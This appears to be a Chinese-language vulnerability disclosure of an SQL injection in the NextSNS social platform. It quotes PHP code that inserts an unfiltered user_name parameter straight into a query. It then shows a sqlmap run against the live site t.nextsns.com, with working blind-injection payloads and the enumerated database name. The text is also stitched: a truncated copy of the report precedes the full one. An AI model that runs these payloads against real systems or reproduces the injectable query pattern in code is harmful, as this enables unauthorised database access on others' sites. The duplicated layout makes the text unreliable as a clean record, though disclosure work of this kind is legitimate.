### 简要描述: 搞开发的,把产品自身安全做好才是王道,而不是借助某些所谓的安全产品来帮助防御! ### 详细说明: Location: Home/Lib/Action/SpaceAction.class.php 代码片段 ``` //profile 获得用户 public function getuser() { if ($this->my['user_name']==$_GET['user_name']) { $user=$this->my; } else { //$_GET[user_name]参数未过滤,这里的$_GET[user_name],就是url上的t.nextsns.com/?user_name $user=$this->uModel->where("user_name='$_GET[user_name]'")->find(); } return $user; } ``` 虽然内置了某数字的防御系统,但还是能注出数据! ``` python sqlmap.py -u "http://t.nextsns.com/?fate666888*" --batch --dbs --flush-session URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection points with a total of 375 HTTP(s) requests: --- Place: URI Parameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://t.nextsns.com:80/?fate666888' AND 7549=7549 AND 'etdJ'='etdJ Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload:...
### 简要描述: 搞开发的,把产品自身安全做好才是王道,而不是借助某些所谓的安全产品来帮助防御! ### 详细说明: Location: Home/Lib/Action/SpaceAction.class.php 代码片段 ``` //profile 获得用户 public function getuser() { if ($this->my['user_name']==$_GET['user_name']) { $user=$this->my; } else { //$_GET[user_name]参数未过滤,这里的$_GET[user_name],就是url上的t.nextsns.com/?user_name $user=$this->uModel->where("user_name='$_GET[user_name]'")->find(); } return $user; } ``` 虽然内置了某数字的防御系统,但还是能注出数据! ``` python sqlmap.py -u "http://t.nextsns.com/?fate666888*" --batch --dbs --flush-session URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection points with a total of 375 HTTP(s) requests: --- Place: URI Parameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://t.nextsns.com:80/?fate666888' AND 7549=7549 AND 'etdJ'='etdJ Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://t.nextsns.com:80/?fate666888' AND SLEEP(5) AND 'vvIC'='vvIC --- back-end DBMS: MySQL 5.0.11 available databases [1]: [*] etnew ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201402/122133039d2b43d1623cd964c78fad99fc08ec11.jpg" alt="QQ图片20140212212952.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/122133039d2b43d1623cd964c78fad99fc08ec11.jpg)
